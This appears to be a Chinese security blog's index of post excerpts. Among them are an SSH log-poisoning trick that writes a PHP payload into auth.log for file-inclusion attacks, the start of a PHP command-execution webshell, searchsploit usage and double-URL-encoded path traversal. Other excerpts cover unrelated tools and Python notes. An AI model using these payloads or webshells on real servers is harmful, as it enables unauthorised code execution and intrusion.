摘要:
今天看文章学了一招,有包含漏洞无法传文件的时候用 目标服务器环境为ubuntu,ssh登录日志文件是/var/log/auth.log 找个Linux的环境执行ssh '<? phpinfo(); ?>'@192.168.48.129 这个时候我们看下auth.log里面有什么 PHP代码被成功写入 阅读全文
摘要:
搬瓦攻方案库存监控页面 https://stock.bwg.net/ https://bwh81.net/ https://bandwagonhost.com/ https://teddysun.com/602.html 阅读全文
摘要:
kali里面自带这个工具,用来搜索www.exploit-db.com上面的漏洞库,在由于是提前内置了数据库所以不联网也可以用。 使用之前先更新一下确保是最新的漏洞库 searchsploit --update 搜索程序漏洞 searchsploit 程序名 查看结果 searchsploit -m 阅读全文
摘要:
<?php $evil=`set`; echo '<pre>'.$evil.'</pre>'; ?> 成功执行set命令,你懂的! 顺手写了个php执行cmd命令的马,保存为1.php <!DOCTYPE html> <html> <head> <title></title> </head> <bo 阅读全文
摘要:
1.用Chrome登录微博 2.点我的主页 3.往下翻到翻不动为止,想删哪一页就选哪一页 4.复制以下代码 // ==UserScript== // @name Weibored.js // @namespace http://vito.sdf.org // @version 0.2.0 // @d 阅读全文
摘要:
https://blog.csdn.net/weixin_43965597/article/details/107864200 阅读全文
摘要:
先上个图 2021最新版 1.使用docker查看是否有awvs; [root@hadoop-01 awvs13-linux]# docker search awvs NAME DESCRIPTION STARS OFFICIAL AUTOMATED secfa/docker-awvs AWVS13 阅读全文
摘要:
一般编码一次是%5c。 但攻击者怕这个会被认出来,所以用二次编码,把%本身编码成%25。再和后边拼成%255c。 如果URL解码器有缺陷,只不断重复“从前边开始解析”这个步骤,就会把这个先变回%5c,再变成/,出现循环解析。当然这是错误的。正确的只应该解一步变成%5c。 抵抗父级目录回溯攻击,绝对不 阅读全文
摘要:
引:此文是自己学习python过程中的笔记和总结,适合有语言基础的人快速了解python3和没基础的作为学习的大纲,了解学习的方向、知识点;笔记是从多本书和视频上学习后的整合版。 (一)初识python 1、一般文件以.py为格式;用#作注释. 2、一般对象不用特别声明,python会自动识别;一个 阅读全文
摘要:
https://blog.csdn.net/weixin_45745344/article/details/109279097 阅读全文